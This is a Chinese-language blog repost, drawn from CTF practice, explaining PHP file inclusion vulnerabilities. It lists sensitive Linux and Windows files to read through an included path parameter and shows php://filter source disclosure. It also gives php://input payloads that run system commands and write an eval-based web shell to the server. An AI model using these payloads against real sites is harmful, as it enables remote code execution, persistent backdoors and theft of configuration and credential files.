文件包含漏洞

最新推荐文章于 2022-10-20 16:45:51 发布

weixin_30920091

最新推荐文章于 2022-10-20 16:45:51 发布

阅读量92

点赞数

文章标签： php shell 数据库

原文链接：http://www.cnblogs.com/bieff-66/p/10645349.html

版权

做ctf时，看到网页地址是xxxxx/index.php?file=show.php就想到了文件包含漏洞

总结

1， phpinfo.txt文件是什么？有什么用？

新建一个phpinfo.txt，然后新建一个shell.php，写入：

<?php

Include( "phpinfo.txt");

?>

　　访问shell.php会输出phpinfo页面内容，无论将扩展名改为什么，都将以php代码执行。如果文件不是符合php规则的（即没有写<?php ?>等），则通过include可以直接输出源码。

2，远程包含漏洞

远程包含漏洞

前提：需要开启allow_url_fopen，默认关闭。
新建php.txt:

<?php

echo "hello world";

?>

新建index.php

<?php

Include( $_GET['page']);

?>

访问 http://www.xxxx.com/page=http://www.xxxx.com/php.txt执行结果将输出hello world

3，文件包含利用

读取敏感信息

如：http://www.xxx.com/index.php?page=/etc/passwd
Windows:

c:\boot.ini

c:\windows\systems32\inetsrv\MetaBase.xml

c:\windows\repair\sam

c:\windows\php.ini php配置文件

c:\windows\my.ini mysql配置文件

LINUX：

       /etc/passwd 
     
       /usr/ 
      local/app/apache2/conf/http.conf 
     
       /usr/ 
      local/app/php5/lib/php.ini PHP相关设置 
     
       /etc/httpd/conf/http.conf apache配置文件 
     
       /etc/my.cnf mysql配置文件 
     
      完整解释连接： 
     https://thief.one/2017/04/10/2/ 
    
     https://thief.one/2016/09/22/%E4%B8%8A%E4%BC%A0%E6%9C%A8%E9%A9%AC%E5%A7%BF%E5%8A%BF%E6%B1%87%E6%80%BB-%E6%AC%A2%E8%BF%8E%E8%A1%A5%E5%85%85/ 
    
      （1）php://filter    能够得到base64加密后的字符串 
    
      php://filter/read=convert.base64-encode/resourse=config.php 
    
      （2）php://input   可生成 
    
      构造?page=php://input，并提交<?php system('net user'); ?> 
    
      （3）如果提交<? fputs(fopen("shell.php","w"),"<?php eval($_POST['xxser']; ?>") ?>，将会在index.php目录下生成shell.php